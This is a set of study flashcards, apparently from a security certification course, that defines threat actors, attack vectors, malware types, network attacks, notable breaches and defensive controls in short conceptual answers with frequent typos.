Chapter 2

Question 1

Threat Actor

Answer 1

An entity that is the cause of an event that has impacted the safety of another entity. Also called a malicious actor.

Question 2

Avalanche Effect

Answer 2

In a hashing algorithm if one bit is changed then the entire hash is completely different

Question 3

Advanced Persistent Threat (APT)

Answer 3

Highly sophisticated threat actors that can make constant attacks and have access to massive resources.

Question 4

Unskilled attackers

Answer 4

A threat actor that runs premade scripts without any knowledge of what is haappening under the hood. “Script kiddies”

Question 5

Hacktivist

Answer 5

A hacker with a purpose that is motivated by philosophy, revenge, disruption etc. Can be very sophisticated and motivated but often has access to limited funding.

Question 6

Insider Threat

Answer 6

Someone from inside the organization who can use organization resources against itself for revenge, financial gain etc. Has knowledge of where to aattack and security vulnerabilities.

Question 7

Organized Crime

Answer 7

Usually motivated by money, almost always an external entity. Very sophisticated. Lots of capital.

Question 8

Shadow IT

Answer 8

Members of the organization that use workarounds to avoid the security put in place by the IT department. They often set up their own networks to get around limitations like change control and other security practices. Can be a huge risk.

Question 9

Threat Vector

Answer 9

The method an attacker uses to gain access to the system. Also called “attack vector”

Question 10

Phishing

Answer 10

Enticing someone to click on a link that can trick you into exposing sensitive data or installing malware. Social engineering intended to trick the recipient into thinking it is a legittimate communication or service.

Question 11

Scalable Vector Graphic (SVG)

Answer 11

A image file format that can contain embedded code. Can be used to perform HTML injections or deliver javascript attack code.

Question 12

File Based Vectors

Answer 12

More than just executables, malicous code can hide in many places such as: Adobe PDFs or microsoft office macros

Question 13

Removable device vectors

Answer 13

USBs can be used to get around a firewall. These can be used to infect air gapped systems.

Question 14

Air gapped Network

Answer 14

A network with no direct connection to the internet or other networks

Question 15

802.1x

Answer 15

An authentication protocol that prevents the access of data or network resources until proper credentials are provided.

Question 16

Supply Chain Vector

Answer 16

Tampering with the underlying infrastructure of manufacturing process to add vulnerabilities.

Question 17

Managed Service Providers (MSP)

Answer 17

Monitors systems and informs you if things need to be changed. If an attacker can infiltrate an MSP they will have access to many organizations systems.

Question 18

Typosquatting

Answer 18

URLs that are similar to the legitimate site but have slight changes.

Question 19

Pretexting

Answer 19

Using sotries and lies to manipulate you into believing their story. Attacker is a character in the story they create.

Question 20

Smishing

Answer 20

SMS phishing

Question 21

Impersonation

Answer 21

The attacker pretending to be someone they arent. Could introduce themselves as someone higher in rank.

Question 22

Identity Fraud

Answer 22

The attacker uses your information to impersonate you, giving them access to your resources and privileges.

Question 23

Watering hole Attack

Answer 23

Infecting a 3rd party site that employees of the target organization frequent and use it and use it to gain access. Infect all users and then pursue their target.

Question 24

Defense in Depth

Answer 24

Layering defense measures that can catch threats that others may have missed

Question 25

Buffer Overflow

Answer 25

Writing more than is expected into a particular area of memory, causing other memory to be overwritten. Developers need to perform bounds checking to prevent this. Difficult exploit, and it needs to be repeatable to be useful.

Question 26

Race Condition

Answer 26

When two events happen at nearly the same time within an application. This can be a big issue if it is not planned for.

Question 27

Time of Check to Time of Use (TOCTOU)

Answer 27

Applications may perform a check for a condition before performing an action. Sometimes something may happen between that check and action which can have negative consequences.

Question 28

Malicious Updates

Answer 28

Attackers perform a supply chain attack to add malicous code to official updates.

Question 29

Operating System

Answer 29

The foundational computing platform of a device. Is often tens of millions of lines of code, so there is a large surface area for attack.

Question 30

Patch Tuesday

Answer 30

Every second tuesday of the month there is a new windows update

Question 31

Code Injection

Answer 31

Adding your own code into an applications input areas. Enabled because of bad programming.

Question 32

Structured Query Language (SQL)

Answer 32

The most common relational database language

Question 33

SQL Injection

Answer 33

Adding your own requests to the input of an existing application. Applications should not allow users to make their own specific requests.

Question 34

Cross Site Scripting (XSS)

Answer 34

A type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Question 35

Persistent XSS Attack

Answer 35

Attacker posts a message to a social network that incudes the malicious code. Everyone who clicks the page gets the payload. Could add code that forces the viewers to post the message to their own page.

Question 36

Hardware Vulnerabilities

Answer 36

Devices that are connected to a network are potential security risks.

Question 37

IOT

Answer 37

Internet of things

Question 38

Firmware

Answer 38

The operating system of a hardware device. We may not have direct access to this software. Sometimes we have no idea what this operating system even is. Venders are the only ones who can fix this, and many dont care about security vulnerabilities.

Question 39

End of Life Notice (EOL)

Answer 39

A notice that a manufacturer is no longer selling the product. Many times the product will stop recieving updates and patches.

Question 40

End of Service Life (EOSL)

Answer 40

Manufacturer is no longer selling or providing support for the product. May still ahve a premium cost service option. EOSL is a significant concern as security patches are an important part of normal operation.

Question 41

Legacy Platforms

Answer 41

Older devices that may be running end of life software. The security risks and maintainance costs must be compared to the returns. May require additional security protections like additional firewall rules. Add additional IPS signatures for older operating systems.Vi

Question 42

Virtual Machine (VM)

Answer 42

an isolated computing environment created by abstracting resources from a physical machine.

Question 43

VM Escape

Answer 43

Breaking out of the VM and interacting with the host operating system or hardware.

Question 44

Hypervisor

Answer 44

Manages the relationship between the physical and virtual resources of a virtual machine and it’s host.

Question 45

Common Vulnerability Scoring System (CVSS)

Answer 45

A way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity

Question 46

Directory Traversal

Answer 46

Allowing people to manually move around the structure of a webserver into different folders or subdirectories.

Question 47

Remote Code Execution (RCE)

Answer 47

The ability for attackers to run code on a machine without direct physical access.

Question 48

Out of Bounds Write

Answer 48

Write to unauthorized memory areas resulting in data corruption, crashing, or code execution.

Question 49

Supply Chain

Answer 49

The process of getting a product from the raw materials all the way to getting the finished product to a consumer. Attackers can infect the product or service at any step along the way

Question 50

Target Corp 2013 Breach

Answer 50

40 million credit cards stolen. HVAC firm in pennsylvania was infected. Nakware was delivered in a phishing email and VPN credentials were stolen. Attackers now had access to the HVAC systems within the Target Corp Network. The HVAC and cash register systems were on the same network with no access restrictions between the two. Attackers put malware on every cash register and used it to collect credit cards.

Question 51

Misconfiguration Vulnerabilities

Answer 51

With all of the different systems that an organization needs to perform their day to day business it is increasingly easier to misconfigure one of them. Cloud computing increases this as there are many permissions and settings to configure.

Question 52

Insecure Protocols

Answer 52

Some protocols arent encrypted, which means that data traverses the network in the clear. Telnet, FTP, SMTP, IMAP.

Question 53

Mira Botnet

Answer 53

Takes advantage of default configurations. Takes over IOT devices. Looks for over 60 default configurations. Camera, routers, doorbells, garage door openers etc. Mira is released as open source software.

Question 54

Port Security

Answer 54

Each time you enable an inbound service on a server you must open a port. That port is used by someone on the outside to gain access to that specific application, this gives them access to a a section of your server. Port numbers are often managed by a firewall, which will allow or deny traffic based on port number or application.

Question 55

Mobile Device Vulnerabilities

Answer 55

Often challenging to secure. Need additional security policies and systems. Relatively small and easy to hide. Almost always in motion. Packed with sensitive data, both personal and organizational. Constantly connected to the internet.

Question 56

Jailbraking/Rooting

Answer 56

Replacing the operating system of a mobile device with one of your own. This circumvents security features.

Question 57

Mobile Device Manager

Answer 57

(MDM)

Question 58

Sideloading

Answer 58

Installing an app without using an official app store.

Question 59

Zero Day Vulnerability

Answer 59

A vulnerability that is unknown to the vendor for which a patch or fix is not available.

Question 60

Zero Day Attack

Answer 60

Exploiting a zero day vulnerability which results in the security community needing to work very hard to patch the issue.

Question 61

Common Vulnerabilities and Exposures (CVE)

Answer 61

cve.mitre.org Provides a reference method for publicly known information-security vulnerabilities and exposures.

Question 62

Malware

Answer 62

Malicious software that does bad things to your system. Gathering information, show you advertising, encrypting and holding your data randsom.

Question 63

Randsomware

Answer 63

Infects your machine, encrypts you data, and then requests that you pay them to decrypt your data. A negative form of cryptography. A good reason to backup your data often. Store backups offline so that randsomware cannot infect it.

Question 64

Virus

Answer 64

Malware that can replicate itself

Question 65

Worm

Answer 65

A malware that can self replicate between systems without any user input. Uses the network as a transmission medium. Self propagates and spreads quickly.

Question 66

Spyware

Answer 66

Malware that watches everything on your computer.

Question 67

Bloatware

Answer 67

Unnecessary software that comes preinstalled on your device. Often the device manufacturers are paid to include them. Uses up storage, slows your system, exposes your system to potential exploits.

Question 68

Keyloggers

Answer 68

Captures your input data, saves it to a file, and sends it back to the attackers. This circumvents encryption.

Question 69

Dark Comet

Answer 69

A remote access trojan (RAT) keylogger

Question 70

Logic Bomb

Answer 70

Waits for an event to occur and then activates to cause harm to the system. Reboots, erases data, makes changes.

Question 71

Rootkit

Answer 71

Hides itself in the kernel of the operating system. Modifies core system files. Can be invisible to the operating system. Secure boot with UEFI Bios confirms that the operating system signature is unchanges before the system is booted.

Question 72

Physical attacks

Answer 72

Gaining physical access to a device, which circumvents many network security protocols and protections

Question 73

Radio Frequency Identification (RFID)

Answer 73

Commonly used for access badges and key fobs. These can be cloned in seconds using devices available on amazon for under $50. Badges can be duplicated at a bar, or on a train on the way to work. Another reason to use MFA.

Question 74

Environmental Attacks

Answer 74

Attacks involving everything supporting the technology and network. Turning off the power to a datacenter, Damage HVAC systems or fire supression.

Question 75

Denial of Service (DOS)

Answer 75

Forcing a service to fail. Often done by overloading the system with too many requests or data. May be used as a smokescreen for some other exploit.

Question 76

Unintentional DOSing

Answer 76

Misconfiguring your system in a way that creates a loop or bandwidth issue, causing your system to stop working. Things like flooding from a broken waterline can also cause this.

Question 77

Distributed Denial of Service (DDOS)

Answer 77

Launching an army of computers to bring down a service. This is why attackers create botnets. Using malware attackers can take control of thousands or millions of computers and aim their traffic at one service.

Question 78

Asymetric Threat

Answer 78

Attacker may have less resources but can still easily bring down large organizations

Question 79

DDOS Reflection and Amplification

Answer 79

Reflecting traffic of another device or service. Turns a snall attack into a big one. Uses internet services against the victim. Uses protocols with little to no authenication or checks. NTP, DNS, ICMP. When you request information from an NTP server you generally recieve back more information that is in the request.

Question 80

DNS poisoning

Answer 80

Causing a user to visit an IP address they did not origionally intend. Can be done by modifying a DNS server (difficult) or by modifying the client host file (easier). The host file takes precident over DNS queries. This is an on path attack

Question 81

Domain Hijacking

Answer 81

Get access to the domain registration and you have control where the traffic flows.

Question 82

Wireless Deauthentication

Answer 82

A wireless DOS attack. Removes the victim from a connected network. 802.11 wireless includes management frames which attackers can use to disconnect the victim from the network. The frames were unencrypted. IEEE patched this issue in 802.11ac update to encrypt important management frames.

Question 83

Radio Frequency Jamming (RF Jamming)

Answer 83

Transmitting interfering wireless signals to decrease the signal to noise ratio at the recieving device. This causes the recieving device to not get a clear signal. Sometimes it is not intentional: Florecent lights, microwaves.

Question 84

Fox Hunting

Answer 84

Finding the RF jammer using directional antennas and an attenuator

Question 85

On Path Attack

Answer 85

The attacker sits between two devices to watch their traffic. Formerly called Man-in-the-middle. Catches and passes along or redirects the data.

Question 86

ARP Poisoning

Answer 86

On path attack on a local IP Subnet. Attacker must be on the same subnet. ARP has no security like encryption.

Question 87

On Path Browser Attack

Answer 87

Attacker uses malware or trojan to gain access to the victims computer or browser. Allows the attacker to access the data before it is encrypted.

Question 88

Replay Attack

Answer 88

Network attack where an attacker intercepts and maliciously retransmits data that was already exchanged. The attacker needs access to the raw network data using a network tap, ARP poisoning, or malware.

Question 89

Pass the Hash

Answer 89

Attacker intercepts an authentication request (user and hashed password). Attacker then sends their own auth request using the captured information. Avoided by using session key encryption and salting.

Question 90

Cookies

Answer 90

Files that store information about the sites that you visit. Used for tracking, personalization, session management. Can be used to store session IDs which could be used by an attacker to gain access to a server without providing any log in credentials.

Question 91

Preventing Session Hijacking

Answer 91

Encrypt end-to-end. HTTPS encrypts your data. VPNs can allow for some encryption

Question 92

Wannacry Randsomeware

Answer 92

Executable exploited a vulnerability in windows SMBv1. Allowed for arbitrary code execution. Allowed access to the OS.

Question 93

British Airways cross site scrypting

Answer 93

22 lines of malicious javascript code was added to checkout pages. Information was stolen from 380000 victims

Question 94

Estonian Central Health Database

Answer 94

SQL injection that breached all healthcare information for an entire country

Question 95

Horizontal Privilege Escalation

Answer 95

Allows user A to access User B resources.

Question 96

Address space Layout Randomization

Answer 96

Randomizes where data is stored in memory each time an application is run. Makes buffer overflows less repeatable.

Question 97

Downgrade Attack

Answer 97

Forces a victim to use a less secure encryption method.

Question 98

SSL Stripping

Answer 98

A combination of an on-path attack with a downgrade attack where the attacker gets in the middle of a conversation and starts sending unencrypted web page information to trick the victim into using non-encrypted protocols like HTTP instead of HTTPS. Victim must make initial request using HTTP. Attacker captures that request and passes it along to the server, establishing a cryptographic link with the server so that it can now view the data once the server moves over to https.

Question 99

Password Attacks

Answer 99

Passwords need to be stored as a salted hash. The SHA-256 hash is used in many applications

Question 100

Spraying Attack

Answer 100

Attack an account with the top few common passwords. If it doesn’t work, they simply move on to the next account

Question 101

Brute Force

Answer 101

Trying every possible password compination until the hash is matched. Most accounts will lockout after a number of attempts so attackers will obtain the list of users and hashes, and then run the brute force attack offline.

Question 102

Indicators of Compromise (IOC)

Answer 102

An event that indicates an intruision. Unusually high amount of network activity, change to file hash values, irregular international traffic, changes to DNS data, uncommon login patterns, spikes of read requests to certain files.

Question 103

Account Lockout

Answer 103

Credentials aren’t working or exceeded login attempts even though you did not make these attempts

Question 104

Concurrent Session usage

Answer 104

There should not be multiple account logins from multiple locations or systems. If someone is logging in from very different locations in a short time frame alarms should be firing.

Question 105

Resource Consumption

Answer 105

Every attackers action will ahve an equal and opposite reaction. File transfers use bandwidth, firewall logs show outgoing transfer, servers may have crashed due to an attacker looking for an exploit

Question 106

Out of Cycle Logging

Answer 106

Log or log data that should not occur during that time frame

Question 107

Missing Log information

Answer 107

Attackers will try to cover their tracks by removing logs. Missing logs are suspicious, logs need to be secure and monitored. There should be alerts and notifications if logs are tampered with.

Question 108

Segmentation

Answer 108

Can help limit the scope of a security event. Can be done through physical, logical, or virtual means. Also can be done to improve performance and reliability. May also be mandated or needed for compliance: PCI (payment card industry) compliance.

Question 109

Access Control List (ACL)

Answer 109

Allows you to group catagories of traffic and allow or deny these requests.

Question 110

Full Disk Encryption (FDE)

Answer 110

Encrypting everything on the drive. Can use tools like bitlocker and firevault.

Question 111

Monitoring

Answer 111

Aggregating information about your systems and devices. Could be built into devices or as standalone devices. Often integrated into servers, switches, routers, firewalls etc.

Question 112

Sensors

Answer 112

IPS, logs

Question 113

Collectors

Answer 113

A place where all of the logs are consolidated and can be viewed.

Question 114

Security Information and Event Manager (SIEM)

Answer 114

a type of collector. May include a correlation engine to compare diverse sensor data.

Question 115

Least privilege

Answer 115

Rights and permissions should be configured to the bare minimum needed to perform their job objectives.

Question 116

Decommissioning

Answer 116

Should be a formal policy. Most often associated with storage devices. Can wipe the device for use in another system or destroy the physical device.

Question 117

Hardening

Answer 117

Making a device or system more secure

Question 118

Endpoint

Answer 118

The devices that the user is using to access the data.

Question 119

Endpoint Detection and Response (EDR)

Answer 119

Goes beyond signatures to detect a threat. Behavior analysis, machine learning, process monitoring. An EDR software is capable of isolating the system, quarantining the threat, rolling back to a previous config. EDRs are API driven, so no user or technician intervention is required.

Question 120

Host Based Firewall

Answer 120

A personal software based firewall that runs on every endpoint. A great place to identify and block unknown processes that may have been launched due to a security vulnerability. Runs on each device but can be managed by a central console.

Question 121

Intrusion Prevention System

Answer 121

A network security tool that monitors network traffic for potential threats and automatically blocks them.

Question 122

Host Based Intrusion Prevention System (HIPS)

Answer 122

Often built in to the EDR or anti-mal. Watches all inbound traffic for known attacks. Secures OS and application configs. Validates incoming service requests. Identifies signatures, heuristics, behavioral changes, buffer overflows, registry updates, writing files to the windows folder, access to non-encrypted data.